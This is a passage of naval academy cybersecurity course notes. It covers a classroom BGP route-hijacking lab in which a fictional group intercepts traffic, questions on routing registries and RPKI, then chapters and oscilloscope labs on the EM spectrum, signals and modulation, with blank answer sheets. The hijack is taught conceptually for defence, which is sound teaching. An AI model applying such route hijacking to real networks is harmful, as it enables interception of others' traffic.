Question 4: Perform a tracert (do not forget the –d option) to the MidTube webserver. List the IP addresses in the order they appear on your answer sheet. Is this the correct route to the MidTube webserver?

2. The PTA’s Back!

It seems Prof. Evil and the PTA are back to their old tricks again! This time, rather than simply shutting down MidTube, they were able to place themselves in between you and the MidTube webserver. From that vantage point they could observe all traffic destined for 17.17.200.0/24 and identify those who were enjoying themselves rather than paying attention in class. To do this, the PTA made the following announcement from Router 3 in AS2003:

Question 5: Assuming no local preferences are set and for every AS in the EC310 internet, on your network diagram draw the path each AS would select to reach 17.17.200.2, beginning from the AS router and ending with the MidTube webserver.

The correct answer to Question 5 will be explained in detail by your instructor, but the astute midshipman may realize that the PTA’s actions only redirect traffic in the forward direction. That is, traffic leaving AS2016 destined for the MidTube webserver would be forced through AS2003, but traffic leaving AS2005 destined for AS2016 would not be forced through AS2003. The MidTube webserver will respond to all web requests via a separate path chosen by Router 5 of AS2005.

Question 6 (Extra Credit): What announcement(s) should the PTA use in order to become the MITM in the reverse direction? (Hint: Consider the Initial Setup instructions of Security Exercises 17 and 18.)

3. Disconnect from the EC310 Internet

Close all tabs in Chrome or Firefox.
Disconnect the blue Ethernet cable.
Turn on your wireless adapter.

STOP!
We’ll now return to your regularly scheduled lecture.

Part 3: The Real Internet

While it is fun playing around in the EC310 internet, it is not enough to see all the parts and pieces that make the real Internet work. Let’s get to know some of the organizations we mentioned in lecture that are responsible for the safe and effective operation of the real Internet. Let’s also take a closer look at the solutions available to secure Internet routing.

1. Internet Routing Registries

Recall from Chapter 18 that the Internet Routing Registries (IRRs) house important information about the IP prefixes, ASNs, routing policy, network topology and human points of contact of registered ASes. Access the website www.irr.net in either Firefox or Chrome on your Windows computer (i.e., not your Cyber2 VM) via the USNA network (i.e., not the EC310 internet).

Click the link for an ‘Overview of the IRR’.

Question 7: What do the IRRs provide?

Question 8: When did they come about?

Click the link for a ‘List of Routing Registries’.

Question 9: How many routing registries are there?

Click the link for ‘FAQ: Why Use a Routing Registry?’ and read the first email shown, from oberman@es.net.

Question 10: Why use a routing registry?

Question 11: Do people trust the information in the IRR? When is this a problem?

2. Regional Internet Registries and Resource Public Key Infrastructure

One of the most effective solutions against false route injection into the Internet routing system is the use of Resource Public Key Infrastructure (RPKI). Just within the last few years, all Regional Internet Registries (RIRs) began offering RPKI. Access the website https://www.arin.net/resources/rpki/index.html in either Firefox or Chrome on your Windows computer. Watch the video ‘Resource Certification Explained’ to learn more about how RPKI works.

Question 12: In RPKI, what is used to verify that an IP address has been allocated to a specific entity?
Question 13: In RPKI, what is used to verify that an AS may originate a specific network prefix?

Question 14: What is one thing RPKI does not provide assurance of?

Question 15: What must AS network operators do with the data from RPKI to secure Internet routing?

STOP! We’ll now complete your regularly scheduled lecture.

Security Exercise 18 Answer Sheet

Name:

Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6 (Extra Credit):
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:

[Network diagram answer sheet for EC310 Security Exercises 17 & 18: the EC310 internet (AS 2016 with R16, RA, RC and “Other USNA Networks”; AS 20 R20; AS 30 R30; AS 40 R40; AS 50 R50; AS 60 R60; AS 2003 R3 with www.pta.net 21.200.3.2 in 21.200.3.0/24; AS 2005 R5 with www.midtube.com 17.17.200.2 in 17.17.200.0/24), with blank announcement boxes a), b) and c) of the form “Network: ___.___.___.___/__ AS-Path: ______” (one marked SX18 ONLY) and the fixed announcements Network: 21.200.3.0/24 AS-Path: 2003 and Network: 17.17.200.0/24 AS-Path: 2005.]

Part III: Wireless

In this, the final module of the course, you will be introduced to how digital information, in the form of bits, is moved from one location to another through free space, that is, without using wires or cables. However, while the ability to move information through free space makes communication more convenient, it also makes communication more susceptible to eavesdropping or jamming. Therefore, we will also explore the vulnerabilities of wireless communication.
Chapter 19: Communications Systems, EM Spectrum, and Signals

Objectives:
(a) Describe the four components of a communications system and the impact on security of using free space as a communication medium.
(b) Identify communication applications for various bands of the electromagnetic spectrum ranging from extremely low frequency (ELF) to extremely high frequency (EHF).
(c) Define the term signal and explain the basic properties of a sinusoidal electromagnetic signal (period, frequency, wavelength, phase, and amplitude) and describe their mathematical relationship.
(d) Plot simple (sinusoidal) electromagnetic signals in the time and frequency domains; interpret time- and frequency-domain plots to determine the associated signals.
(e) Define and calculate bandwidth of transmitted signals.

Connection to Cyber Security

This chapter marks the beginning of the third part of EC310. In Part I: The Host, we examined how data are stored and accessed in memory at the machine level and examined the resulting threats against a specific computer, focusing on the buffer overflow attack. In Part II: Networks, we concentrated on understanding how the Internet works and how networks are just as important and vulnerable as the individual host computers that reside on them. In Part III: Wireless, we will gain an appreciation for communicating in an environment without physical connections to every computer, router, etc. in the network, leading up to how wireless communication systems can be hacked.

(Graphic by Dane Brown)

I. Communications Systems and the Electromagnetic Spectrum

A. Communication Systems

The purpose of a communications system is to transmit information over a distance. This “information” could be audio (such as speech or music), video, sensor data (temperature, pressure), or other data (e.g., text, stock prices, photos, etc.).
“Over a distance” may mean from here to the other side of the world via a satellite, or from one computer to another in a network, or from your computer’s CPU to its RAM.

Any communications system consists of the following basic components, which are shown in the following figure. There are four main components:

• Transmitter – converts information into an electronic form suitable for the channel
• Channel – the physical medium through which an electronic signal travels
  o e.g., wire, fiber-optic cable, free space (i.e., air), water (sonar)
• Receiver – converts the received signal back to a usable form
• Noise – undesired, random corrupting energy

The information is passed to the transmitter. The receiver produces a “recovered” information signal, which may not be the same signal that was transmitted. This is because a significant, though undesired, occurrence in all communication systems is noise, which is random energy that enters the system and interferes with (corrupts) the transmitted message. If the noise is strong enough, the information signal may not get through at all. You’ve all heard what noise sounds like, for example on a telephone (we sometimes refer to it as static). If the static is very powerful you will only hear a small portion (or none) of the words that are spoken to you. This relationship between the useful signal and corrupting noise will be formalized in Chapter 23.

Noise can be divided into two broad categories:

• External noise is noise introduced into the transmission channel from outside sources. Examples include:
  o Industrial noise arising from man-made electrical sources (e.g., motors, generators, switches)
  o Atmospheric noise due to naturally occurring disturbances in earth’s atmosphere (e.g., lightning)
  o Extraterrestrial noise due to solar and cosmic activity.
• Internal noise is noise introduced by the electronics inside the receiver itself.
  Examples include:
  o Thermal noise
  o Semiconductor noise

For the third block of this course, we will focus on communications systems in which our channel or medium is free space. Free space can refer to a perfect vacuum (as you might recall from physics), or to the air (as opposed to transmission through a wire or other material). Signals that propagate in free space are often referred to as “wireless” or “over-the-air” signals, and all signals in free space are part of the electromagnetic spectrum. With wireless routers and satellites part of almost every network, especially in military applications, understanding the electromagnetic spectrum is critical to cyber security.

B. Electromagnetic Spectrum

The electromagnetic spectrum is the range of all possible frequencies of electromagnetic waves. The spectrum is broken into regions/ranges and classified by frequency and/or wavelength.

• The frequency (f) of an electromagnetic wave is a measure of how rapidly it oscillates. Frequency is measured in Hertz (1 Hz = 1 cycle/sec).
• The period (T) of an electromagnetic wave is the length of time required to complete one cycle. The period is measured in seconds, and is the reciprocal of the frequency in Hz (T = 1/f).
• Wavelength (λ) is the physical distance between the peaks of one cycle of a transmitted wave as it moves through the medium, and is measured in meters (m).

The following plots show an EM wave’s voltage as a function of time (left plot), and as a function of distance (right plot).

For electromagnetic waves traveling in air (or vacuum), we will assume that they travel at the speed of light (c), which is roughly 3 × 10^8 m/s. The wavelength is inversely proportional to the frequency, and is related to the speed of light by:

    λ = c / f

The specific bands of frequencies in the EM spectrum are shown in the following figure. In this course, we are concerned with communications in the frequency ranges from ELF to EHF.
Later in the course, you will see that antennas are needed to transmit information using the EM spectrum. The following figure should give you an idea of the relationship between wavelength size (which will determine antenna size) and transmission frequency throughout the Electromagnetic Spectrum.

You should be familiar with the frequency ranges for communications from ELF to EHF.

• Extremely low frequency (ELF): 30 Hz to 300 Hz. Power line frequencies and low end of human audio.
• Voice frequency (VF): 300 Hz to 3000 Hz. Typical range associated with human voice.
• Very low frequency (VLF): 3 kHz to 30 kHz. Used for communications with submerged submarines.
• Low frequency (LF): 30 kHz to 300 kHz. Long range radio navigation.
• Medium frequency (MF): 300 kHz to 3000 kHz. AM radio and long range communication.
• High frequency (HF): 3 MHz to 30 MHz. Known as “short wave”, used by two-way radio.
• Very high frequency (VHF): 30 MHz to 300 MHz. Radio communications and FM radio.
• Ultra high frequency (UHF): 300 MHz to 3000 MHz. TV, military and cell phones.
• Super high frequency (SHF): 3 GHz to 30 GHz. Microwave. Satellite communications and radar.
• Extremely high frequency (EHF): 30 GHz to 300 GHz. Satellite communications.

Practice Problem 19.1
What is the wavelength of an FM radio station whose broadcast frequency is 101.1 MHz?

Practice Problem 19.2
What is the frequency of a signal whose wavelength is 8 cm?

Bandwidth

Bandwidth is the amount of the frequency spectrum occupied by a signal, regardless of where it is in the spectrum. It is the difference between the upper and lower frequency limits of the signal. Typical bandwidths:

• AM Radio Station – 10 kHz
• FM Radio Station – 180 kHz
• Broadcast TV Station – 6 MHz

If a signal occupies the range of frequencies between approximately 300 Hz and 3000 Hz, its bandwidth is 2700 Hz, as the following figure demonstrates.
Federal Communications Commission (FCC)

The electromagnetic spectrum is crowded; everyone wants some bandwidth. The FCC was established by the Communications Act of 1934 to regulate interstate and foreign communication. The FCC:

• Allocates bands of frequencies for specific uses
• Sets limitations on broadcast power
• Monitors broadcasts to detect unlicensed operations and technical violations
• Auctions spectrum usage

The FCC controls which portions of the EM spectrum are used for various purposes (e.g., FM radio, AM radio, broadcast TV, satellite communications). The FCC also makes sure that transmissions do not interfere with each other (two transmitters physically close to each other transmitting in the same frequency range can destroy each other’s signals). For example, Washington D.C. can have an FM station that transmits at 101.1 MHz (the FM station called FM101), but Baltimore cannot have an FM station that transmits at 101.1 MHz because it is too close to the Washington D.C. station (approximately 35 miles away).

Because the spectrum is a non-renewable resource in a society that is increasingly connected, it is incredibly precious. To give you an idea of its value, 400 MHz of spectrum was auctioned by the FCC in 2015 and sold for $44.9 billion!

II. Signals as a Function of Time and Frequency

Recall that the purpose of a communications system is to transmit information over a distance. The block diagram for a communication system is again shown below.

Thus far, we’ve covered that during the final section of this course we’re going to focus on free space as our channel or medium, which means we’re considering the electromagnetic spectrum. Why do we care? Information can be in various forms. We transmit information in the form of a signal.

A. Signals

A signal is a function that conveys information. Signals are considered either analog or digital.

Analog Signals

An analog time-signal is one that is defined along a continuum of times and amplitudes.
For example, the continuous changes in air pressure produced by a vibrating vocal cord or guitar string are examples of analog voice and music signals, respectively. An analog signal can take on an infinite number of values between a maximum and a minimum level; that is, the values are from a continuum. Some examples of analog signals are shown below.

Digital Signals

A digital time-signal, in contrast, is one that is defined for only discrete values of time and amplitude. Digital signals change in discrete increments and can be used to represent binary information, such as that used by computers. Although this is its strict definition, the term “digital signal” is also often used to refer to continuous-time signals that can take on only a fixed set of states or amplitude values. We will adopt this usage frequently in EC310, and these are the types of digital signals shown in the figure below. Digital signals will be covered in more detail in Chapters 21-22.

A simple example of a signal, widely used in both analog and digital communications, is a tuning fork (that is, the sound it produces is its signal). You can hear the tuning fork, but if you were to look at it graphically as a function of air pressure over time, you would see something that looks like this, which is a sine wave at a frequency of 440 Hz.

[Figure: 440 Hz sine wave, Voltage (V) from -0.15 to 0.15 versus Time (sec) from 0 to 0.025]

B. Time Domain (Sine Wave)

Earlier in this chapter, we discussed some basic properties of sinusoidal (electromagnetic) waves.
A sinusoidal voltage waveform can be expressed mathematically in the following way:

    v_m(t) = V_m sin(2π f_m t + θ),    where f_m = 1 / T_m

• Amplitude (V_m) – distance from average to peak (in volts)
• Period (T_m) – time to complete one cycle (in seconds)
• Frequency (f_m) – number of cycles in one second (in Hz)
• Phase (θ) – left/right shift with respect to the t = 0 axis (in radians)

The sine wave is one way to represent the sound the tuning fork makes as a function of time. This is referred to as its “time domain” representation. If the amplitude of the signal is 2 Volts, then the equation for the tuning fork signal would be:

    v_m(t) = 2 sin(2π 440 t).

This signal can also be represented in terms of its frequency content (i.e., which frequencies are present in the signal) in the “frequency domain.”

C. Frequency Domain (Frequency Spectrum)

To display a signal in the frequency domain, we determine the frequency content of the signal (which can be done using Fourier theory or, for this class, by inspection, since the signals we will analyze are composed of sinusoids). The frequency content is then displayed on a plot of magnitude vs. frequency (magnitude is the absolute value of amplitude). Since our tuning fork is a very simple tone with a single frequency component of 440 Hz and an amplitude of 2 V, the frequency domain plot looks like this:

Both the time-domain (sine wave) and the frequency-domain displays represent the important characteristics of the tuning fork as far as a communication system is concerned; they’re just different ways to express the same signal. For communication engineers, the primary interest is what portion of the frequency spectrum the signal occupies and how strong the signal is (magnitude); for our purposes, phase offset (if present) is not part of the frequency plot.

Suppose we had a slightly more complicated signal. Suppose

    v_m(t) = 2 sin(2π 440 t) − 3 sin(2π 900 t + π/4) + 5 cos(2π 1100 t − 2π/7).
In this case, there are three sinusoids (i.e., there are three frequencies in the signal), so the frequency plot will have three spikes, at the three frequencies given, with heights corresponding to the magnitudes of the amplitudes given. Again, the phases shown are not a part of this plot.

Part of the benefit of a frequency domain representation is that certain signal attributes, like bandwidth, are easy to visualize. For instance, in the above graph, you can quickly see the bandwidth is 1100 Hz – 440 Hz = 660 Hz.

Problems

1. What is the purpose of a communications system? Draw and explain the components.

2. What part of the electromagnetic spectrum (frequency range) is visible to humans?

3. Find 5 major uses of the UHF band (use a book or the Internet to find your answer).

4. Calculate the frequency of signals with the following wavelengths:
   a. 30 m
   b. 2 km
   c. 8 cm

5. AM Radio
   a. What is the frequency range used by AM radio broadcast stations?
   b. What is the bandwidth (BW) occupied by each station?

6. Given the sine wave below, answer the following questions:
   [Figure: sine wave plot, Amplitude (V) from -4 to 4 versus time (msec) from 0 to 0.15]
   a. What is the period of this signal?
   b. What is this signal’s amplitude?
   c. What is the frequency of this signal?
   d. In which range of the electromagnetic spectrum would this signal be classified?
   e. What is the wavelength of this signal?
   f. Sketch this signal in the frequency domain.

7. Given the following equation for a signal, sketch the frequency plot. Put your frequency axis in kHz.
       v_m(t) = −18 sin(2π 44,000 t) + 13 sin(2π 150×10^3 t − 6π/11) + 7 cos(2π 30×10^4 t + π/21)

8. Given the following plot, write the equation for one signal that has this as its frequency plot (note: there is not one single answer).
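As an added example (this is not code from the EC310 notes), the following Python reads the frequency content of the chapter's three-term signal by inspection, computes its bandwidth, and then confirms the same three spikes from time-domain samples with a plain DFT, which is the computation behind an FFT display such as the one used in Security Exercise 19. The signal terms are the chapter's; the sample rate (4400 Hz) and sample count (440) are choices made here so that every frequency falls exactly on a DFT bin.

```python
# Added example (not from the EC310 notes): frequency content of a sum of
# sinusoids, first by inspection as the chapter does, then from sampled data.
import cmath
import math

# Sample input, constructed from the chapter's three-term signal:
#   v_m(t) = 2 sin(2π440t) - 3 sin(2π900t + π/4) + 5 cos(2π1100t - 2π/7)
# Each term is (amplitude, frequency in Hz, phase in radians, "sin" or "cos").
EXAMPLE_SIGNAL = [
    (2.0, 440.0, 0.0, "sin"),
    (-3.0, 900.0, math.pi / 4, "sin"),
    (5.0, 1100.0, -2 * math.pi / 7, "cos"),
]


def evaluate(components, t):
    """Time-domain value v_m(t) of the sum of sinusoids at time t (seconds)."""
    total = 0.0
    for amp, freq, phase, kind in components:
        arg = 2 * math.pi * freq * t + phase
        total += amp * (math.cos(arg) if kind == "cos" else math.sin(arg))
    return total


def spectrum_by_inspection(components):
    """Frequency plot read straight off the equation: one spike per sinusoid,
    at its frequency, with height |amplitude|. Sign and phase are not plotted."""
    return sorted((freq, abs(amp)) for amp, freq, _phase, _kind in components)


def bandwidth_hz(spikes):
    """Bandwidth = highest frequency present minus lowest frequency present."""
    freqs = [freq for freq, _mag in spikes]
    return max(freqs) - min(freqs)


def dft_spectrum(samples, fs):
    """Plain O(N^2) DFT of real samples. Returns (frequency, magnitude) for bins
    0..N/2, scaled so a sinusoid of amplitude A appears as a spike of height A
    (a linear scale in volts, not the dB scale an oscilloscope FFT shows)."""
    n = len(samples)
    out = []
    for k in range(n // 2 + 1):
        acc = sum(x * cmath.exp(-2j * math.pi * k * i / n)
                  for i, x in enumerate(samples))
        scale = 1 / n if k in (0, n // 2) else 2 / n  # DC/Nyquist bins are not doubled
        out.append((k * fs / n, abs(acc) * scale))
    return out


def measured_spectrum(components, fs=4400.0, n=440, threshold=0.05):
    """Sample the signal at fs Hz for n samples, take the DFT and keep the bins
    that rise above the noise floor. fs must exceed twice the highest frequency
    present (sampling theorem); fs/n = 10 Hz here, so 440, 900 and 1100 Hz each
    land exactly on a bin and do not leak into their neighbours."""
    highest = max(freq for _amp, freq, _phase, _kind in components)
    if fs <= 2 * highest:
        raise ValueError("sample rate too low: fs must exceed 2 * %g Hz" % highest)
    samples = [evaluate(components, i / fs) for i in range(n)]
    return [(round(freq), round(mag, 6))
            for freq, mag in dft_spectrum(samples, fs) if mag > threshold]


if __name__ == "__main__":
    spikes = spectrum_by_inspection(EXAMPLE_SIGNAL)
    print("by inspection:", spikes, "bandwidth =", bandwidth_hz(spikes), "Hz")
    print("from samples: ", measured_spectrum(EXAMPLE_SIGNAL))
```

Both routes give spikes at 440, 900 and 1100 Hz with heights 2, 3 and 5 and a bandwidth of 660 Hz; the negative sign on the 900 Hz term and the phase offsets disappear, exactly as the text says they do on a magnitude plot. Lowering fs below 2200 Hz makes the sampled version fail, which is the aliasing limit a real spectrum display also has.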
Security Exercise 19
Introduction to Signals in the Time and Frequency Domains

PART I: INTRODUCTION & SINUSOIDAL SIGNALS

Check off each step as you complete it.

Step One: Function generator setup.

□ Turn on power to the lab bench. The power switch is on the right side of the lab bench and is labeled "120 V OUTLETS." The switch should be in the raised position if power is on.
□ Locate the "10MHz Function/Arbitrary Waveform Generator" on the lab bench and turn the power on. We will refer to this equipment as simply the "function generator."
□ Select the sinusoidal function by pressing the button with the Sine wave on it. The function generator display should indicate a small sine wave.
□ Turn any other lit buttons off.

As the name implies, the function generator is able to generate electrical signals. For this lab we will use the function generator to generate sinusoidal voltage waveforms. We will set the frequency to 1.75 kHz using the key pad method.

□ Select the Frequency (Freq) function using the soft keys under the display screen.
□ Enter the desired frequency (1.75) using the key pad.
□ Enter the desired units (kHz) by pressing the button under kHz on the screen.

We will set the size of the waveform to 10 Vpp (volts peak-to-peak) using the key pad method.

□ Select the Utility function and then select the Output Setup soft key. Check that High Z is highlighted. If not, push the Load/High Z button until it is highlighted. Push Done.
□ Select the Amplitude (Ampl) function using the soft keys under the display screen.
□ Enter the desired amplitude (10) using the key pad.
□ Enter the desired units (Vpp) by pressing the button under Vpp on the screen.
□ Press the output button. It should now be lit, indicating the function generator is producing an output.

Right now your function generator is generating a 1.75 kHz signal that has a peak-to-peak voltage of 10 V. But…that signal is not leaving the function generator.
To see the signal, we will send the output of the function generator to an oscilloscope. Proceed to Step Two!

Step Two: Oscilloscope familiarization.

□ Locate the oscilloscope at the top of your lab bench and turn its power on. The power push button is located on the top left of the oscilloscope.

The oscilloscope can receive electrical signals from two probes, channel 1 (CH 1) and channel 2 (CH 2). We have attached adaptors to CH 1 and CH 2, so that they can receive electrical signals via our banana plug cables.

□ Locate the CH 1 input on your oscilloscope. It will have a two-input (RED / BLACK) banana plug adaptor installed.
□ Connect banana plug cables (which can be found under the bench on the plastic Quad board) from the function generator’s output to the CH 1 input on the oscilloscope (connect red-to-red and black-to-black).

The oscilloscope has the ability to measure and display two different electrical signals, but only with respect to one common reference point. The BLACK CH 1 input provides this common reference point (ground) for both CH 1 and CH 2. Therefore, CH 2 has an adaptor for only one banana plug. We will not be using CH 2 for this lab.

Before looking at our sine wave on the scope in detail, let's first pause and look at a generic display which explains how the information on the oscilloscope screen is presented. Your screen will not look like the screen shown in Figure 1 below!

In the figure below, we see that the oscilloscope display is divided up into eight major vertical divisions. The bottom left corner of the oscilloscope—where you see "CH1 100mV"—indicates the number of volts per division for a given channel. You can see that CH 1 and CH 2 indicate 100 mV per division; therefore each major division in the vertical axis represents 100 mV. Similarly, there are ten major divisions on the horizontal axis that represent time. Each major division on the horizontal axis of the display represents 250 μs.
CH 1 and CH 2 can have different Volts/Div, but will always share the same Sec/Div.

Step Three: Display your sine wave with the oscilloscope.

□ Press the AUTOSET button (top right) on the oscilloscope. AUTOSET will measure the input signals for the channels selected and attempt to display something meaningful.
□ With the CH 1 menu selected, adjust the position of the vertical axis zero level by rotating the vertical position knob in the CH 1 column, so that the “1→” on the left side of the display is adjacent to the major horizontal axis (centered vertically on the display).
□ If needed, press the CH2 Menu button twice to turn off the CH 2 trace, since nothing is connected to CH 2 for this lab (CH 2 is displaying background noise).
□ Press CH 1 MENU on the oscilloscope and make the following settings.
    Coupling: AC
    BW Limit: OFF
    Volts/Div: COARSE
    Probe: 1X
    Invert: Off
□ Adjust the VOLTS/DIV knob under the vertical section in the CH 1 column, so that CH 1 indicates 2 Volts/Div on the bottom left corner of your display.
□ Adjust the SEC/DIV knob under the horizontal axis, so that the oscilloscope indicates 100 μs per major division on the LCD on the bottom middle of your display.

Step Four: Measuring the waveform on the oscilloscope.

Manual method. The first method is by counting the divisions of the grid and applying the scale (volts/div for vertical, or sec/div for horizontal). This will only provide you with approximate values with little precision.

Question 1. Fill out the table on your answer sheet using this manual measurement method. Specifically:

□ Using the vertical scale, determine the peak-to-peak voltage on CH 1, which is the total voltage from positive peak to negative peak. That is, you should count the number of vertical divisions from peak to peak, and multiply the number of divisions by the number of volts/division.
□ From your measured Vpp, determine the amplitude of the signal (Vm).
□ Using the horizontal scale, determine the period (Tm) and then calculate the signal's frequency. That is, you should count the number of horizontal divisions for one full cycle, and then multiply the number of divisions by the number of microseconds (in this case) per division.

Taking measurements with cursors. The oscilloscope has time and amplitude cursors that you can move on the plot to help take measurements of voltage, period and frequency.

□ Press the Cursor button (top middle) to view the cursor menu on the LCD.
□ Then choose the Type of cursor to be Amplitude by cycling through the options on the button associated with this menu option. Two horizontal cursors will now appear that are moveable.
□ Choose the Source to be CH 1.
□ Two cursors are now available for you to move around the display. Push Cursor 1 to move the first cursor, and Cursor 2 when you want to move the second cursor. The cursors are moved using the large knob next to the green power-on light. Place cursor 1 at the sinusoid’s maximum voltage, and cursor 2 at its minimum. The ΔV value (which is the voltage difference between the two cursors) can be read out on the right side of the display…this is the peak-to-peak voltage.
□ Then choose the Type of cursor to be Time by cycling through the options on the button associated with this menu option. Two vertical cursors will now appear that are moveable.
□ Adjust the two time cursors to allow you to measure the period of the sinusoid.

Question 2. Fill out the table on your answer sheet using the cursor measurement method.

Taking automatic measurements. The oscilloscope has the ability to take automated measurements of voltage, period and frequency.

□ Press the Measure button (top middle) to view the measurement menu on the LCD, then push the top menu box button to highlight Source and select CH1 for Measure 1.
□ Then choose the Type of measurement to be Pk-Pk by cycling through the options on the button associated with this menu option, and then hit the button for the Back option.
□ Press the second-to-top menu box button to select Measure 2.
□ Then choose the Type of measurement to be Freq by cycling through the options on the button associated with this menu option, and then hit the button for the Back option.
□ You can add new measurements for all 5 buttons. Amplitude is not automatically measured but can still be calculated from the peak-to-peak voltage as before. Record your results in Question 2.

Question 3. Fill out the table on your answer sheet using the automatic measurement method.

Consider how you would describe your sinusoidal signal as an equation. The phase describes the start of one signal relative to another, so we will assume the phase is zero.

Question 4. The equation for a sine wave is v_m(t) = V_m sin(2π f_m t + θ). Write your equation for the sinusoid based on your measurements from the previous pages.

Step Five: Measuring a pure sine wave in the frequency domain.

Our scope can also provide a frequency spectrum of a signal. For this particular sinusoidal signal we know it is periodic and has a single frequency, fm, described by the previous measurements and shown in our equation. Now let us see how this signal is displayed in the frequency domain. The oscilloscope performs a Fast Fourier Transform (FFT) and displays the magnitudes of the frequencies present in the signal vs. frequency, so the horizontal scale shows frequency (in Hz) instead of time.

□ Press AUTOSET (top right) and you will see the options to display the signal in time or in frequency (FFT).
□ Push the button next to the FFT and you will see a spike at a particular frequency.
□ Set the horizontal scale to read 250 Hz per division by turning the Sec/Div knob.
At this point, you should see one large spike in the display (which corresponds to the sinusoidal signal from CH 1), and also many smaller spikes scattered throughout the frequency spectrum (this is noise). Your concern is the large spike.

Question 5. The left edge of the display is 0 Hz, and frequency increases from 0 Hz as you move to the right. Determine the value of the frequency component (fm = ?) by counting the number of horizontal divisions and multiplying that by the number of Hz per division.

You can check your answer using the frequency cursor:

□ Press the Cursor button (top middle) to view the cursor menu on the LCD.
□ Choose the Source to be MATH (note: this is because the FFT is a mathematical computation).
□ Then choose the Type of cursor to be Frequency. Two vertical cursors are now available for you to move around the display. Push Cursor 1 to move that cursor, and place it on the largest spike. The readout of frequency will be displayed on the right side of the LCD.

Question 6. Sketch your frequency plot (as seen on the oscilloscope) and label the axes with your values. Include the smaller noise spikes. Have your instructor check it.

Note: this oscilloscope displays the amplitude of the frequency content in decibels (dB) vice volts, as you have been taught. The default vertical scale is 10 dB per vertical division, and the bottom of the scale is 0 dB, so label the vertical axis accordingly. Use the Amplitude cursor on the FFT plot to determine the height of the spike.

PART II: PUTTING YOU TO THE TEST—UNKNOWN SIGNALS

So…are you comfortable using the function generator and the oscilloscope? Let's find out!

Your instructors have pre-set two different sinusoidal signals into the function generator. Your goal is to determine the amplitude and frequency of each.
□ Reset the oscilloscope back to the time domain from the frequency domain, by pressing the Autoset button and then selecting the button next to the multiple cycles of a sine wave (at the top, above the FFT button). (If the pesky Channel 2 display is active, hit CH2 Menu twice.)
□ Ask your Instructor/Lab Tech to enter Challenge Signal 1. You will find this challenging because it is named "Challenge Signal 1."
□ Push AUTOSET on the oscilloscope. Determine the amplitude and frequency of the sine wave. Obviously you should use only the oscilloscope (do not try to finagle with the function generator, pushing various buttons to see if it will cough up the answer!). Use only the oscilloscope! Place your answers in Question 7. Show your instructor or lab tech before continuing.

□ Ask your Instructor/Lab Tech to enter Challenge Signal 2. You will find this challenging because…well…you know.
□ Push AUTOSET on the oscilloscope. Determine the amplitude and frequency of the sine wave. Use only the oscilloscope! Place your answers in Question 8. Show your instructor or lab tech before calling it a day.

PART III: IT'S A WRAP!

□ Unplug and stow the banana plug cables.
□ Turn off your oscilloscope.
□ Turn off your function generator.
□ Pat yourself on the back for your cyber expertise.
Security Exercise 19 Answer Sheet

Name: __________________________________________________________________________________________

Question 1 (manual method), v_m(t) on CH1:
    Peak-to-peak (Vpp):
    Amplitude (Vm):
    Period (Tm):
    Frequency (fm):

Question 2 (cursor method), v_m(t) on CH1:
    Peak-to-peak (Vpp):
    Amplitude (Vm):
    Period (Tm):
    Frequency (fm):

Question 3 (automatic method), v_m(t) on CH1:
    Peak-to-peak (Vpp):
    Amplitude (Vm):
    Period (Tm):
    Frequency (fm):

Question 4: v_m(t) = ____________________________________ (show values)

Question 5: __________________________________

Question 6: ___________________ Instructor / Lab Tech

Question 7: Amplitude: __________ Frequency: __________ ____________________ Instructor / Lab Tech

Question 8: Amplitude: __________ Frequency: __________ ____________________ Instructor / Lab Tech

Chapter 20: Intro to Modulation

Objectives:
(a) Define the term baseband signal and describe some potential limitations associated with transmitting baseband signals directly.
(b) Discuss the role of modulation in signal transmission and the methods of modulating a sinusoidal carrier.
(c) Using a plot of an AM signal, determine Vmax, Vmin, Vm, Vc and m.
(d) Create a frequency plot for and determine the sidebands and bandwidth of an AM signal where the information signal consists of one or more distinct sinusoids.
(e) Determine the condition for overmodulation in an AM signal, and the consequence of overmodulation.

Connection to Cyber Security

In Chapter 19, we defined a communications system and learned that the wireless section of EC310 will focus on communications in which the communication channel is free space. We also learned that in order to send any information through a communications system it must be in the form of a signal (which is the name given to the function that conveys our information), and if our communication channel is free space, it means we’re dealing with signals carried in the Electromagnetic Spectrum (EM). Finally, we learned that signals can be represented as a function of either time or frequency.
Wireless channels have different vulnerabilities than we saw in the host section of the course, because of the frequency of transmission. It is possible that a wireless network can be attacked like we saw in the networks section of the course, but to see how such a cyber attack can be carried out on a wireless network or a wireless communication in general, you must first understand how information is carried through the wireless channel.

1. Baseband Signals

If you’re sitting in your EC310 classroom in the basement of Rickover Hall and you speak to the student next to you, will that person be able to hear you? Will you be heard across the room? How about at the end of that loooong Rickover passageway? Does anyone in Bancroft have a chance of hearing what you’re grumbling about in your EC310 classroom? Why not? Your voice doesn’t travel as far as you might like it to—your voice creates pressure waves in the air, and the strength of these waves attenuates over distance. The louder you yell the farther you’ll be heard, but this of course has its limits.

As an alternative to walking around screaming all day, you might consider speaking at a more normal volume into a microphone. A microphone is a device that transforms sound pressure waves into electrical signals. You could then send the electrical output of the microphone to an antenna. Then your voice frequencies would travel as electromagnetic waves (“radio waves”), and as long as you provided enough power to the antenna, you could presumably greatly extend the geographic range of your EC310 musings. In this chapter, we’ll see that the latter approach is on the right track, but in order to be practical, it requires a bit more finesse.

In this example our voice signal, which you’ll recall is comprised of frequencies roughly in the range between 300 Hz and 3 kHz, is what we call a baseband signal. Baseband signals are information signals at their original frequencies, typically low frequencies.
To transmit a baseband signal directly as is, we use baseband transmission…as you’ll see shortly, communication systems typically will upshift the frequency spectrum of baseband signals to a higher range of frequencies to allow transmission through the atmosphere.

In general, before signals can be transmitted effectively, they must first be converted to a form that is compatible with the communication medium. One facet of this conversion is transducing the signal from its natural physical form into an electrical signal. For example:

• Microphones convert acoustic pressure waves (sound) into electrical signals.
• Video cameras convert light patterns into electrical signals.
• Computer keyboards convert physical input (typing) into electrical signals.

But, as alluded to above, even after converting your voice signal to, say, a voltage signal using a microphone, attempting to transmit it over the air as a baseband signal is impractical. Why? Let’s look at an example that will point us in the right direction.

Practice Problem 20.1
Physics dictates that antenna length is intrinsically tied to the wavelength of the signal it is transmitting or receiving. To transmit a signal through the atmosphere with an antenna efficiently, the length of the antenna must be at least a tenth of a wavelength long. What is the approximate length of the antenna required to transmit the sound of a tuning fork (which creates musical note A = 440 Hz)? Note: this sound must be transduced into an electrical signal first before it is transmitted.

